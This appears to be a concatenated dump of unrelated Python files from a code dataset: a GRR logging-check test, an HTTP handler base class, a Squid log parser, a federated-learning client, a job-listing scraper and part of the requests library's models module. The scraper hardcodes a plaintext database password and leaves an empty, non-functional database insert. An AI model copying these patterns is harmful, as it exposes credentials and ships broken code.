results = self.RunChecks(host_data)
self.assertCheckDetectedAnom(chk_id, results, sym, found)
def testFindNoRunningLogserver(self):
chk_id = "CIS-SERVICE-LOGSERVER-RUNNING"
sym = "Missing attribute: Logging software is not running."
context = "RAW"
found = ["Expected state was not found"]
host_data = self.GenHostData()
# Try it without rsyslog.
results = self.RunChecks(host_data)
self.assertCheckDetectedAnom(chk_id, results, sym, found)
# Now rsyslog is running.
logs = rdf_client.Process(name="rsyslogd", pid=1236)
host_data["ListProcessesGrr"][context].append(logs)
results = self.RunChecks(host_data)
self.assertCheckUndetected(chk_id, results)
# Check with some problematic real-world data.
host_data = self.GenHostData() # Reset the host_data.
# Added a non-logger process. We expect to raise an anom.
proc1 = rdf_client.Process(name="python",
pid=10554,
ppid=1,
exe="/usr/bin/python",
cmdline=["/usr/bin/python", "-E",
"/usr/sbin/foo_agent",
"/etc/foo/conf.d/rsyslogd.conf",
"/etc/foo/foobar.conf"])
host_data["ListProcessesGrr"][context].append(proc1)
results = self.RunChecks(host_data)
self.assertCheckDetectedAnom(chk_id, results, sym, found)
# Now added a logging service proc. We expect no anom. this time.
proc2 = rdf_client.Process(name="rsyslogd",
pid=10200,
ppid=1,
exe="/sbin/rsyslogd",
cmdline=["/sbin/rsyslogd", "-i",
"/var/run/rsyslogd.pid", "-m", "0"])
host_data["ListProcessesGrr"][context].append(proc2)
results = self.RunChecks(host_data)
self.assertCheckUndetected(chk_id, results)
# Add yet another non-logger process. We should still raise no anom.
proc3 = rdf_client.Process(name="foobar",
pid=31337,
ppid=1,
exe="/usr/local/bin/foobar",
cmdline=["/usr/local/bin/foobar", "--test",
"args"])
host_data["ListProcessesGrr"][context].append(proc3)
results = self.RunChecks(host_data)
self.assertCheckUndetected(chk_id, results)
def main(argv):
test_lib.GrrTestProgram(argv=argv)
if __name__ == "__main__":
flags.StartMain(main)
| 38.865306
| 80
| 0.584016
|
84986dba79fc0c9f5b7e05abdc15e14e487abe70
| 3,377
|
py
|
Python
|
REST_vs_AMQP/REST/DefaultHTTPRequestHandler.py
|
James-Chapman/python-code-snippets
|
9d3678055dc0d9ef2d5f10da6673477e64ba7b48
|
[
"BSD-2-Clause"
] | null | null | null |
REST_vs_AMQP/REST/DefaultHTTPRequestHandler.py
|
James-Chapman/python-code-snippets
|
9d3678055dc0d9ef2d5f10da6673477e64ba7b48
|
[
"BSD-2-Clause"
] | null | null | null |
REST_vs_AMQP/REST/DefaultHTTPRequestHandler.py
|
James-Chapman/python-code-snippets
|
9d3678055dc0d9ef2d5f10da6673477e64ba7b48
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
#===============================================================================
# Author : J.Chapman
# License : BSD
# Date : 4 August 2013
# Description : Python 3 Default HTTP Request Handler
#===============================================================================
import http.server
import logging
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
class DefaultHTTPRequestHandler(http.server.BaseHTTPRequestHandler):
"""
Default HTTP Request Handler Interface class.
"""
def do_OPTIONS(self):
"""
Default OPTIONS function for the Request Handler
"""
try:
logger.debug("OPTIONS request from: {0} to {1}".format(self.client_address, self.path[1]))
self._handle_OPTIONS()
except Exception as ex:
self.send_response(500, ex)
print("Exception in DefaultHTTPRequestHandler.do_OPTIONS(): {0}".format(ex))
def do_HEAD(self):
"""
Default HEAD function for the Request Handler
"""
try:
logger.debug("HEAD request from: {0} to {1}".format(self.client_address, self.path[1]))
self._handle_HEAD()
except Exception as ex:
self.send_response(500, ex)
print("Exception in DefaultHTTPRequestHandler.do_HEAD(): {0}".format(ex))
def do_GET(self):
"""
Default GET function for the Request Handler
"""
try:
logger.debug("GET request from: {0} to {1}".format(self.client_address, self.path[1]))
self._handle_GET()
except Exception as ex:
self.send_response(500, ex)
print("Exception in DefaultHTTPRequestHandler.do_GET(): {0}".format(ex))
def do_PUT(self):
"""
Default PUT function for the Request Handler
"""
try:
logger.debug("PUT request from: {0} to {1}".format(self.client_address, self.path[1]))
self._handle_PUT()
except Exception as ex:
self.send_response(500, ex)
print("Exception in DefaultHTTPRequestHandler.do_PUT(): {0}".format(ex))
def do_POST(self):
"""
Default POST function for the Request Handler
"""
try:
logger.debug("POST request from: {0} to {1}".format(self.client_address, self.path[1]))
self._handle_POST()
except Exception as ex:
self.send_response(500, ex)
print("Exception in DefaultHTTPRequestHandler.do_POST(): {0}".format(ex))
def _handle_OPTIONS(self):
"""
Handle OPTIONS function. Override this method.
"""
self.send_response(501, "Not implemented")
def _handle_HEAD(self):
"""
Handle HEAD function. Override this method.
"""
self.send_response(501, "Not implemented")
def _handle_GET(self):
"""
Handle GET function. Override this method.
"""
self.send_response(501, "Not implemented")
def _handle_PUT(self):
"""
Handle PUT function. Override this method.
"""
self.send_response(501, "Not implemented")
def _handle_POST(self):
"""
Handle POST function. Override this method.
"""
self.send_response(501, "Not implemented")
| 29.884956
| 102
| 0.561149
|
1988a925da1ac98ecdee2533ec29863a23d6c060
| 905
|
py
|
Python
|
allennlp/data/fields/__init__.py
|
tianjianjiang/allennlp
|
0839f5c263911ec5ff04a2ebe575493c7e0436ef
|
[
"Apache-2.0"
] | 2
|
2019-12-03T20:04:56.000Z
|
2021-03-29T10:38:06.000Z
|
allennlp/data/fields/__init__.py
|
tianjianjiang/allennlp
|
0839f5c263911ec5ff04a2ebe575493c7e0436ef
|
[
"Apache-2.0"
] | 5
|
2021-05-03T14:40:33.000Z
|
2021-05-03T14:40:34.000Z
|
allennlp/data/fields/__init__.py
|
tianjianjiang/allennlp
|
0839f5c263911ec5ff04a2ebe575493c7e0436ef
|
[
"Apache-2.0"
] | 2
|
2019-12-21T05:58:44.000Z
|
2021-08-16T07:41:21.000Z
|
"""
A :class:`~allennlp.data.fields.field.Field` is some piece of data instance
that ends up as an array in a model.
"""
from allennlp.data.fields.field import Field
from allennlp.data.fields.array_field import ArrayField
from allennlp.data.fields.adjacency_field import AdjacencyField
from allennlp.data.fields.index_field import IndexField
from allennlp.data.fields.label_field import LabelField
from allennlp.data.fields.multilabel_field import MultiLabelField
from allennlp.data.fields.list_field import ListField
from allennlp.data.fields.metadata_field import MetadataField
from allennlp.data.fields.sequence_field import SequenceField
from allennlp.data.fields.sequence_label_field import SequenceLabelField
from allennlp.data.fields.span_field import SpanField
from allennlp.data.fields.text_field import TextField
from allennlp.data.fields.namespace_swapping_field import NamespaceSwappingField
| 47.631579
| 80
| 0.859669
|
18de46a67e368cc641ee87ec1bd201dd0ecb8e0a
| 4,164
|
py
|
Python
|
lib/squidlog.py
|
mnot/squidpeek
|
9479f4791f56ffe3d3465b6d515c802b9c6cb1a1
|
[
"Unlicense"
] | 2
|
2016-02-04T07:34:32.000Z
|
2016-04-03T19:58:09.000Z
|
lib/squidlog.py
|
mnot/squidpeek
|
9479f4791f56ffe3d3465b6d515c802b9c6cb1a1
|
[
"Unlicense"
] | null | null | null |
lib/squidlog.py
|
mnot/squidpeek
|
9479f4791f56ffe3d3465b6d515c802b9c6cb1a1
|
[
"Unlicense"
] | null | null | null |
#!/usr/bin/env python
'''
Squid Web proxy cache log parsing classes.
'''
# (c) 1998-2007 Copyright Mark Nottingham
# <mnot@pobox.com>
#
# This software may be freely distributed, modified and used,
# provided that this copyright notice remain intact.
#
# This software is provided 'as is' without warranty of any kind.
# Squid Access Logfile Format
# ---------------------------
#
# Version 1.1 Access log
#
# timestamp elapsed_time client log_tag/status bytes method URL rfc931 \
# peer_tag/peerhost mimetype
#
# rfc931: identd info, - otherwise
#
#
# Squid Store Logfile Format
# --------------------------
#
# Version 1.1 Store log
#
# time action status datehdr lastmod expires type expect-len/real-len \
# method key
#
#
# for more information about both formats, see the Squid FAQ at
# http://squid.nlanr.net/
__version__ = '2.0'
from string import atoi, atof, split, join, lower
from re import compile
from urllib import unquote
import sys
class AccessParser:
''' Splitting Squid Access Logfile Parser '''
_mime_splitter = compile("\[(.*?)\] \[(.*?)\]")
_mime_indexer = compile("%0d%0a")
_mime_hasher = compile("([\w\-_]+):\s*(.*)$")
_time_headers = ['date', 'last-modified', 'expires']
def __init__(self, file_descriptor, parse_headers=False, debug=False):
self._fd = file_descriptor
self.parse_headers = parse_headers
self.debug = debug
self.num_processed = 0
self.num_error = 0
def __iter__(self):
return self
def next(self):
while 1: # loop until we find a valid line, or end
line = self._fd.next()
self.num_processed += 1
n = split(line, None)
try:
o = {
'utime': int(float(n[0])),
'elapsed': int(n[1]),
'client': n[2],
'bytes': int(n[4]),
'method': n[5],
'url': n[6],
'ident': n[7],
'mimetype': n[9]
}
o['log_tag'], status = split(n[3], '/', 2)
o['status'] = int(status)
o['peer_tag'], o['peerhost'] = split(n[8], '/', 2)
if len(n) > 10:
if self.parse_headers and n[10][0] == '[': # mime headers present
o['hdr_request'], o['hdr_response'] = self._parse_mime(" ".join(n[10:]))
else: # some other fields; just save them raw in extra...
i = 0
for field in n[10:]:
i += 1
o['extra_%s' % i] = field
return o
except Exception, why:
self.num_error = self.num_error + 1
if self.debug:
sys.stderr.write("PARSE ERROR line %s: %s\n" % (
self.num_processed, why
))
continue
def _parse_mime(self, raw):
match = self._mime_splitter.match(raw)
if not match:
return {}, {}
return ( self._process_hdr(match.group(1)),
self._process_hdr(match.group(2)) )
def _process_hdr(self, raw_header):
from time import mktime, timezone
from rfc822 import parsedate
hdrs = {}
header_list = self._mime_indexer.split(raw_header)
for header in header_list:
match = self._mime_hasher.match(header)
if not match:
continue
key = lower(match.group(1))
value = unquote(match.group(2))
if key in self._time_headers:
value = mktime(parsedate(value)) - timezone
hdrs[key] = value
return hdrs
def test_access():
log = AccessParser(sys.stdin)
for line in log:
print "%s %s %s" % (line['url'], line['status'], line['log_tag'])
print "lines: %s" % (log.num_processed)
print "error: %s" % (log.num_error)
if __name__ == '__main__':
test_access()
| 28.326531
| 102
| 0.513929
|
d50ef794e919c65ee51955b99bc1bb9db1a2eea4
| 1,958
|
py
|
Python
|
algotrader/trading/subscription.py
|
alexcwyu/python-trading
|
a494f602411a3ebfdecae002a16a5ea93fc7a046
|
[
"Apache-2.0"
] | 17
|
2016-03-30T21:52:30.000Z
|
2021-05-01T18:21:48.000Z
|
algotrader/trading/subscription.py
|
ajmal017/python-trading
|
a494f602411a3ebfdecae002a16a5ea93fc7a046
|
[
"Apache-2.0"
] | 2
|
2016-10-04T19:29:05.000Z
|
2017-02-01T19:24:39.000Z
|
algotrader/trading/subscription.py
|
ajmal017/python-trading
|
a494f602411a3ebfdecae002a16a5ea93fc7a046
|
[
"Apache-2.0"
] | 9
|
2016-04-24T05:05:26.000Z
|
2020-05-03T13:01:34.000Z
|
from algotrader.model.market_data_pb2 import MarketDataSubscriptionRequest
from algotrader.model.model_factory import ModelFactory
from algotrader.utils.market_data import get_subscription_type, get_bar_size, get_bar_type
class MarketDataSubscriber(object):
def subscript_market_data(self, feed, instruments, subscription_types, from_date=None, to_date=None):
for sub_req in self.build_subscription_requests(feed.id(), instruments, subscription_types, from_date, to_date):
feed.subscribe_mktdata(sub_req)
def build_subscription_requests(self, feed_id, instruments, subscription_types, from_date=None, to_date=None):
reqs = []
for instrument in instruments:
for subscription_type in subscription_types:
attrs = subscription_type.split(".")
md_type = get_subscription_type(attrs[0])
md_provider_id = attrs[1]
bar_type = get_bar_type(attrs[2]) if md_type == MarketDataSubscriptionRequest.Bar else None
bar_size = get_bar_size(attrs[3]) if md_type == MarketDataSubscriptionRequest.Bar else None
reqs.append(ModelFactory.build_market_data_subscription_request(type=md_type,
inst_id=instrument.inst_id,
feed_id=feed_id,
md_provider_id=md_provider_id,
bar_type=bar_type,
bar_size=bar_size,
from_date=from_date,
to_date=to_date))
return reqs
| 65.266667
| 120
| 0.533197
|
b45fde003be43a9cd530f2545f36a3fa7bdb7ed1
| 2,411
|
py
|
Python
|
exercise5.py
|
regsevillasibal/FTW3_Webscrapping
|
ed64cd866858e612e3a99f9144e6967c687e057f
|
[
"Apache-2.0"
] | null | null | null |
exercise5.py
|
regsevillasibal/FTW3_Webscrapping
|
ed64cd866858e612e3a99f9144e6967c687e057f
|
[
"Apache-2.0"
] | null | null | null |
exercise5.py
|
regsevillasibal/FTW3_Webscrapping
|
ed64cd866858e612e3a99f9144e6967c687e057f
|
[
"Apache-2.0"
] | null | null | null |
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium.common.exceptions import TimeoutException
import os
import pymysql
conn = pymysql.connect(host='127.0.0.1',user='root', passwd = 'g2Rc*ys12', db = 'mysql',
charset = 'utf8')
cur = conn.cursor()
cur.execute("USE scraperdb")
def store(agency, region, position, plantilla, postingDate, closingDate):
# finish this mysql query
cur.execute()
#check this***
cur.connection.commit()
dirpath = os.getcwd()
filepath = dirpath + '/chromedriver'
print('Path to Driver: ' + filepath)
browser = webdriver.Chrome(executable_path = filepath)
browser.get("http://csc.gov.ph/career/index.php")
try:
# Wait as long as required, or maximum of 5 sec for element to appear
# If successful, retrieves the element
element = WebDriverWait(browser,5).until(
EC.presence_of_element_located((By.XPATH, '/html/body/div[1]/div[4]/button/span')))
element.click()
# Find where the element that contains all of the listings
listingsElement = WebDriverWait(browser, 5).until(
EC.presence_of_element_located((By.XPATH, '//*[@id="jobs"]/tbody')))
# Then find all of the listings by using the class name found in all of the individual listings
listings = listingsElement.find_elements(By.TAG_NAME, "tr") # get all of the rows in the table
for row in listings:
# Get the columns from the table row
agency = row.find_elements(By.TAG_NAME, "td")[0] #note: index starts from 0, so 0 is 1st column, 1 is 2nd column, 2 is 3rd column, etc
print(agency.text)
#prints text from the element
region = row.find_elements(By.TAG_NAME, "td")[1]
print(region.text)
positionTitle = row.find_elements(By.TAG_NAME, "td")[2]
print(positionTitle.text)
plantilla = row.find_elements(By.TAG_NAME, "td")[3]
print(plantilla.text)
postingDate = row.find_elements(By.TAG_NAME, "td")[3]
print(postingDate.text)
closingDate = row.find_elements(By.TAG_NAME, "td")[4]
print(closingDate.text)
print("######################")
# call your database insert function here
except TimeoutException:
print("Failed to load")
finally:
browser.quit()
| 34.942029
| 142
| 0.685193
|
39d7f09f68fd7f6a6c5fe1af6ef7c2ed4bb2fc10
| 4,011
|
py
|
Python
|
plato/clients/simple.py
|
iQua/plato
|
76fdac06af8b4d85922cd12749b4a687e3161745
|
[
"Apache-2.0"
] | null | null | null |
plato/clients/simple.py
|
iQua/plato
|
76fdac06af8b4d85922cd12749b4a687e3161745
|
[
"Apache-2.0"
] | null | null | null |
plato/clients/simple.py
|
iQua/plato
|
76fdac06af8b4d85922cd12749b4a687e3161745
|
[
"Apache-2.0"
] | 1
|
2021-05-18T15:03:32.000Z
|
2021-05-18T15:03:32.000Z
|
"""
A basic federated learning client who sends weight updates to the server.
"""
import logging
import time
from dataclasses import dataclass
from plato.algorithms import registry as algorithms_registry
from plato.config import Config
from plato.datasources import registry as datasources_registry
from plato.samplers import registry as samplers_registry
from plato.trainers import registry as trainers_registry
from plato.clients import base
@dataclass
class Report(base.Report):
"""Report from a simple client, to be sent to the federated learning server."""
training_time: float
data_loading_time: float
class Client(base.Client):
"""A basic federated learning client who sends simple weight updates."""
def __init__(self, model=None, datasource=None, trainer=None):
super().__init__()
self.model = model
self.datasource = datasource
self.trainer = trainer
self.trainset = None # Training dataset
self.testset = None # Testing dataset
self.algorithm = None
self.sampler = None
self.data_loading_time = None
self.data_loading_time_sent = False
def __repr__(self):
return 'Client #{}.'.format(self.client_id)
def configure(self) -> None:
"""Prepare this client for training."""
if self.trainer is None:
self.trainer = trainers_registry.get(self.client_id, self.model)
self.trainer.set_client_id(self.client_id)
self.algorithm = algorithms_registry.get(self.trainer, self.client_id)
def load_data(self) -> None:
"""Generating data and loading them onto this client."""
data_loading_start_time = time.time()
logging.info("[Client #%s] Loading its data source...", self.client_id)
if self.datasource is None:
self.datasource = datasources_registry.get()
self.data_loaded = True
logging.info("[Client #%s] Dataset size: %s", self.client_id,
self.datasource.num_train_examples())
# Setting up the data sampler
self.sampler = samplers_registry.get(self.datasource, self.client_id)
if hasattr(Config().trainer, 'use_mindspore'):
# MindSpore requires samplers to be used while constructing
# the dataset
self.trainset = self.datasource.get_train_set(self.sampler)
else:
# PyTorch uses samplers when loading data with a data loader
self.trainset = self.datasource.get_train_set()
if Config().clients.do_test:
# Set the testset if local testing is needed
self.testset = self.datasource.get_test_set()
self.data_loading_time = time.time() - data_loading_start_time
def load_payload(self, server_payload) -> None:
"""Loading the server model onto this client."""
self.algorithm.load_weights(server_payload)
async def train(self):
"""The machine learning training workload on a client."""
training_start_time = time.time()
logging.info("[Client #%s] Started training.", self.client_id)
# Perform model training
self.trainer.train(self.trainset, self.sampler)
# Extract model weights and biases
weights = self.algorithm.extract_weights()
# Generate a report for the server, performing model testing if applicable
if Config().clients.do_test:
accuracy = self.trainer.test(self.testset)
logging.info("[Client #{:d}] Test accuracy: {:.2f}%".format(
self.client_id, 100 * accuracy))
else:
accuracy = 0
training_time = time.time() - training_start_time
data_loading_time = 0
if not self.data_loading_time_sent:
data_loading_time = self.data_loading_time
self.data_loading_time_sent = True
return Report(self.sampler.trainset_size(), accuracy, training_time,
data_loading_time), weights
| 34.878261
| 83
| 0.665171
|
6e634f814e10c50d15e1259dc87340997f502b49
| 34,155
|
py
|
Python
|
virtual/lib/python3.6/site-packages/pip/_vendor/requests/models.py
|
EugeneZnm/LEVELS
|
21874a7585b559795d49b3334e7bb9907af7888a
|
[
"Unlicense"
] | null | null | null |
virtual/lib/python3.6/site-packages/pip/_vendor/requests/models.py
|
EugeneZnm/LEVELS
|
21874a7585b559795d49b3334e7bb9907af7888a
|
[
"Unlicense"
] | 4
|
2020-06-05T19:28:58.000Z
|
2021-09-08T00:33:00.000Z
|
virtual/lib/python3.6/site-packages/pip/_vendor/requests/models.py
|
EugeneZnm/LEVELS
|
21874a7585b559795d49b3334e7bb9907af7888a
|
[
"Unlicense"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
requests.models
~~~~~~~~~~~~~~~
This module contains the primary objects that power Requests.
"""
import datetime
import sys
# Import encoding now, to avoid implicit import later.
# Implicit import within threads may cause LookupError when standard library is in a ZIP,
# such as in Embedded Python. See https://github.com/requests/requests/issues/3578.
import encodings.idna
from pip._vendor.urllib3.fields import RequestField
from pip._vendor.urllib3.filepost import encode_multipart_formdata
from pip._vendor.urllib3.util import parse_url
from pip._vendor.urllib3.exceptions import (
DecodeError, ReadTimeoutError, ProtocolError, LocationParseError)
from io import UnsupportedOperation
from .hooks import default_hooks
from .structures import CaseInsensitiveDict
from .auth import HTTPBasicAuth
from .cookies import cookiejar_from_dict, get_cookie_header, _copy_cookie_jar
from .exceptions import (
HTTPError, MissingSchema, InvalidURL, ChunkedEncodingError,
ContentDecodingError, ConnectionError, StreamConsumedError)
from ._internal_utils import to_native_string, unicode_is_ascii
from .utils import (
guess_filename, get_auth_from_url, requote_uri,
stream_decode_response_unicode, to_key_val_list, parse_header_links,
iter_slices, guess_json_utf, super_len, check_header_validity)
from .compat import (
Callable, Mapping,
cookielib, urlunparse, urlsplit, urlencode, str, bytes,
is_py2, chardet, builtin_str, basestring)
from .compat import json as complexjson
from .status_codes import codes
#: The set of HTTP status codes that indicate an automatically
#: processable redirect.
REDIRECT_STATI = (
codes.moved, # 301
codes.found, # 302
codes.other, # 303
codes.temporary_redirect, # 307
codes.permanent_redirect, # 308
)
DEFAULT_REDIRECT_LIMIT = 30
CONTENT_CHUNK_SIZE = 10 * 1024
ITER_CHUNK_SIZE = 512
class RequestEncodingMixin(object):
@property
def path_url(self):
"""Build the path URL to use."""
url = []
p = urlsplit(self.url)
path = p.path
if not path:
path = '/'
url.append(path)
query = p.query
if query:
url.append('?')
url.append(query)
return ''.join(url)
@staticmethod
def _encode_params(data):
"""Encode parameters in a piece of data.
Will successfully encode parameters when passed as a dict or a list of
2-tuples. Order is retained if data is a list of 2-tuples but arbitrary
if parameters are supplied as a dict.
"""
if isinstance(data, (str, bytes)):
return data
elif hasattr(data, 'read'):
return data
elif hasattr(data, '__iter__'):
result = []
for k, vs in to_key_val_list(data):
if isinstance(vs, basestring) or not hasattr(vs, '__iter__'):
vs = [vs]
for v in vs:
if v is not None:
result.append(
(k.encode('utf-8') if isinstance(k, str) else k,
v.encode('utf-8') if isinstance(v, str) else v))
return urlencode(result, doseq=True)
else:
return data
@staticmethod
def _encode_files(files, data):
"""Build the body for a multipart/form-data request.
Will successfully encode files when passed as a dict or a list of
tuples. Order is retained if data is a list of tuples but arbitrary
if parameters are supplied as a dict.
The tuples may be 2-tuples (filename, fileobj), 3-tuples (filename, fileobj, contentype)
or 4-tuples (filename, fileobj, contentype, custom_headers).
"""
if (not files):
raise ValueError("Files must be provided.")
elif isinstance(data, basestring):
raise ValueError("Data must not be a string.")
new_fields = []
fields = to_key_val_list(data or {})
files = to_key_val_list(files or {})
for field, val in fields:
if isinstance(val, basestring) or not hasattr(val, '__iter__'):
val = [val]
for v in val:
if v is not None:
# Don't call str() on bytestrings: in Py3 it all goes wrong.
if not isinstance(v, bytes):
v = str(v)
new_fields.append(
(field.decode('utf-8') if isinstance(field, bytes) else field,
v.encode('utf-8') if isinstance(v, str) else v))
for (k, v) in files:
# support for explicit filename
ft = None
fh = None
if isinstance(v, (tuple, list)):
if len(v) == 2:
fn, fp = v
elif len(v) == 3:
fn, fp, ft = v
else:
fn, fp, ft, fh = v
else:
fn = guess_filename(v) or k
fp = v
if isinstance(fp, (str, bytes, bytearray)):
fdata = fp
elif hasattr(fp, 'read'):
fdata = fp.read()
elif fp is None:
continue
else:
fdata = fp
rf = RequestField(name=k, data=fdata, filename=fn, headers=fh)
rf.make_multipart(content_type=ft)
new_fields.append(rf)
body, content_type = encode_multipart_formdata(new_fields)
return body, content_type
class RequestHooksMixin(object):
def register_hook(self, event, hook):
"""Properly register a hook."""
if event not in self.hooks:
raise ValueError('Unsupported event specified, with event name "%s"' % (event))
if isinstance(hook, Callable):
self.hooks[event].append(hook)
elif hasattr(hook, '__iter__'):
self.hooks[event].extend(h for h in hook if isinstance(h, Callable))
def deregister_hook(self, event, hook):
"""Deregister a previously registered hook.
Returns True if the hook existed, False if not.
"""
try:
self.hooks[event].remove(hook)
return True
except ValueError:
return False
class Request(RequestHooksMixin):
"""A user-created :class:`Request <Request>` object.
Used to prepare a :class:`PreparedRequest <PreparedRequest>`, which is sent to the server.
:param method: HTTP method to use.
:param url: URL to send.
:param headers: dictionary of headers to send.
:param files: dictionary of {filename: fileobject} files to multipart upload.
:param data: the body to attach to the request. If a dictionary is provided, form-encoding will take place.
:param json: json for the body to attach to the request (if files or data is not specified).
:param params: dictionary of URL parameters to append to the URL.
:param auth: Auth handler or (user, pass) tuple.
:param cookies: dictionary or CookieJar of cookies to attach to this request.
:param hooks: dictionary of callback hooks, for internal usage.
Usage::
>>> import requests
>>> req = requests.Request('GET', 'http://httpbin.org/get')
>>> req.prepare()
<PreparedRequest [GET]>
"""
def __init__(self,
method=None, url=None, headers=None, files=None, data=None,
params=None, auth=None, cookies=None, hooks=None, json=None):
# Default empty dicts for dict params.
data = [] if data is None else data
files = [] if files is None else files
headers = {} if headers is None else headers
params = {} if params is None else params
hooks = {} if hooks is None else hooks
self.hooks = default_hooks()
for (k, v) in list(hooks.items()):
self.register_hook(event=k, hook=v)
self.method = method
self.url = url
self.headers = headers
self.files = files
self.data = data
self.json = json
self.params = params
self.auth = auth
self.cookies = cookies
def __repr__(self):
return '<Request [%s]>' % (self.method)
def prepare(self):
"""Constructs a :class:`PreparedRequest <PreparedRequest>` for transmission and returns it."""
p = PreparedRequest()
p.prepare(
method=self.method,
url=self.url,
headers=self.headers,
files=self.files,
data=self.data,
json=self.json,
params=self.params,
auth=self.auth,
cookies=self.cookies,
hooks=self.hooks,
)
return p
class PreparedRequest(RequestEncodingMixin, RequestHooksMixin):
"""The fully mutable :class:`PreparedRequest <PreparedRequest>` object,
containing the exact bytes that will be sent to the server.
Generated from either a :class:`Request <Request>` object or manually.
Usage::
>>> import requests
>>> req = requests.Request('GET', 'http://httpbin.org/get')
>>> r = req.prepare()
<PreparedRequest [GET]>
>>> s = requests.Session()
>>> s.send(r)
<Response [200]>
"""
def __init__(self):
#: HTTP verb to send to the server.
self.method = None
#: HTTP URL to send the request to.
self.url = None
#: dictionary of HTTP headers.
self.headers = None
# The `CookieJar` used to create the Cookie header will be stored here
# after prepare_cookies is called
self._cookies = None
#: request body to send to the server.
self.body = None
#: dictionary of callback hooks, for internal usage.
self.hooks = default_hooks()
#: integer denoting starting position of a readable file-like body.
self._body_position = None
def prepare(self,
method=None, url=None, headers=None, files=None, data=None,
params=None, auth=None, cookies=None, hooks=None, json=None):
"""Prepares the entire request with the given parameters."""
self.prepare_method(method)
self.prepare_url(url, params)
self.prepare_headers(headers)
self.prepare_cookies(cookies)
self.prepare_body(data, files, json)
self.prepare_auth(auth, url)
# Note that prepare_auth must be last to enable templates schemes
# such as OAuth to work on a fully prepared request.
# This MUST go after prepare_auth. Authenticators could add a hook
self.prepare_hooks(hooks)
def __repr__(self):
return '<PreparedRequest [%s]>' % (self.method)
def copy(self):
p = PreparedRequest()
p.method = self.method
p.url = self.url
p.headers = self.headers.copy() if self.headers is not None else None
p._cookies = _copy_cookie_jar(self._cookies)
p.body = self.body
p.hooks = self.hooks
p._body_position = self._body_position
return p
def prepare_method(self, method):
"""Prepares the given HTTP method."""
self.method = method
if self.method is not None:
self.method = to_native_string(self.method.upper())
@staticmethod
def _get_idna_encoded_host(host):
from pip._vendor import idna
try:
host = idna.encode(host, uts46=True).decode('utf-8')
except idna.IDNAError:
raise UnicodeError
return host
def prepare_url(self, url, params):
"""Prepares the given HTTP URL."""
#: Accept objects that have string representations.
#: We're unable to blindly call unicode/str functions
#: as this will include the bytestring indicator (b'')
#: on python 3.x.
#: https://github.com/requests/requests/pull/2238
if isinstance(url, bytes):
url = url.decode('utf8')
else:
url = unicode(url) if is_py2 else str(url)
# Remove leading whitespaces from url
url = url.lstrip()
# Don't do any URL preparation for non-HTTP schemes like `mailto`,
# `data` etc to work around exceptions from `url_parse`, which
# handles RFC 3986 only.
if ':' in url and not url.lower().startswith('http'):
self.url = url
return
# Support for unicode domain names and paths.
try:
scheme, auth, host, port, path, query, fragment = parse_url(url)
except LocationParseError as e:
raise InvalidURL(*e.args)
if not scheme:
error = ("Invalid URL {0!r}: No schema supplied. Perhaps you meant http://{0}?")
error = error.format(to_native_string(url, 'utf8'))
raise MissingSchema(error)
if not host:
raise InvalidURL("Invalid URL %r: No host supplied" % url)
# In general, we want to try IDNA encoding the hostname if the string contains
# non-ASCII characters. This allows users to automatically get the correct IDNA
# behaviour. For strings containing only ASCII characters, we need to also verify
# it doesn't start with a wildcard (*), before allowing the unencoded hostname.
if not unicode_is_ascii(host):
try:
host = self._get_idna_encoded_host(host)
except UnicodeError:
raise InvalidURL('URL has an invalid label.')
elif host.startswith(u'*'):
raise InvalidURL('URL has an invalid label.')
# Carefully reconstruct the network location
netloc = auth or ''
if netloc:
netloc += '@'
netloc += host
if port:
netloc += ':' + str(port)
# Bare domains aren't valid URLs.
if not path:
path = '/'
if is_py2:
if isinstance(scheme, str):
scheme = scheme.encode('utf-8')
if isinstance(netloc, str):
netloc = netloc.encode('utf-8')
if isinstance(path, str):
path = path.encode('utf-8')
if isinstance(query, str):
query = query.encode('utf-8')
if isinstance(fragment, str):
fragment = fragment.encode('utf-8')
if isinstance(params, (str, bytes)):
params = to_native_string(params)
enc_params = self._encode_params(params)
if enc_params:
if query:
query = '%s&%s' % (query, enc_params)
else:
query = enc_params
url = requote_uri(urlunparse([scheme, netloc, path, None, query, fragment]))
self.url = url
def prepare_headers(self, headers):
"""Prepares the given HTTP headers."""
self.headers = CaseInsensitiveDict()
if headers:
for header in headers.items():
# Raise exception on invalid header value.
check_header_validity(header)
name, value = header
self.headers[to_native_string(name)] = value
def prepare_body(self, data, files, json=None):
"""Prepares the given HTTP body data."""
# Check if file, fo, generator, iterator.
# If not, run through normal process.
# Nottin' on you.
body = None
content_type = None
if not data and json is not None:
# urllib3 requires a bytes-like body. Python 2's json.dumps
# provides this natively, but Python 3 gives a Unicode string.
content_type = 'application/json'
body = complexjson.dumps(json)
if not isinstance(body, bytes):
body = body.encode('utf-8')
is_stream = all([
hasattr(data, '__iter__'),
not isinstance(data, (basestring, list, tuple, Mapping))
])
try:
length = super_len(data)
except (TypeError, AttributeError, UnsupportedOperation):
length = None
if is_stream:
body = data
if getattr(body, 'tell', None) is not None:
# Record the current file position before reading.
# This will allow us to rewind a file in the event
# of a redirect.
try:
self._body_position = body.tell()
except (IOError, OSError):
# This differentiates from None, allowing us to catch
# a failed `tell()` later when trying to rewind the body
self._body_position = object()
if files:
raise NotImplementedError('Streamed bodies and files are mutually exclusive.')
if length:
self.headers['Content-Length'] = builtin_str(length)
else:
self.headers['Transfer-Encoding'] = 'chunked'
else:
# Multi-part file uploads.
if files:
(body, content_type) = self._encode_files(files, data)
else:
if data:
body = self._encode_params(data)
if isinstance(data, basestring) or hasattr(data, 'read'):
content_type = None
else:
content_type = 'application/x-www-form-urlencoded'
self.prepare_content_length(body)
# Add content-type if it wasn't explicitly provided.
if content_type and ('content-type' not in self.headers):
self.headers['Content-Type'] = content_type
self.body = body
def prepare_content_length(self, body):
"""Prepare Content-Length header based on request method and body"""
if body is not None:
length = super_len(body)
if length:
# If length exists, set it. Otherwise, we fallback
# to Transfer-Encoding: chunked.
self.headers['Content-Length'] = builtin_str(length)
elif self.method not in ('GET', 'HEAD') and self.headers.get('Content-Length') is None:
# Set Content-Length to 0 for methods that can have a body
# but don't provide one. (i.e. not GET or HEAD)
self.headers['Content-Length'] = '0'
def prepare_auth(self, auth, url=''):
"""Prepares the given HTTP auth data."""
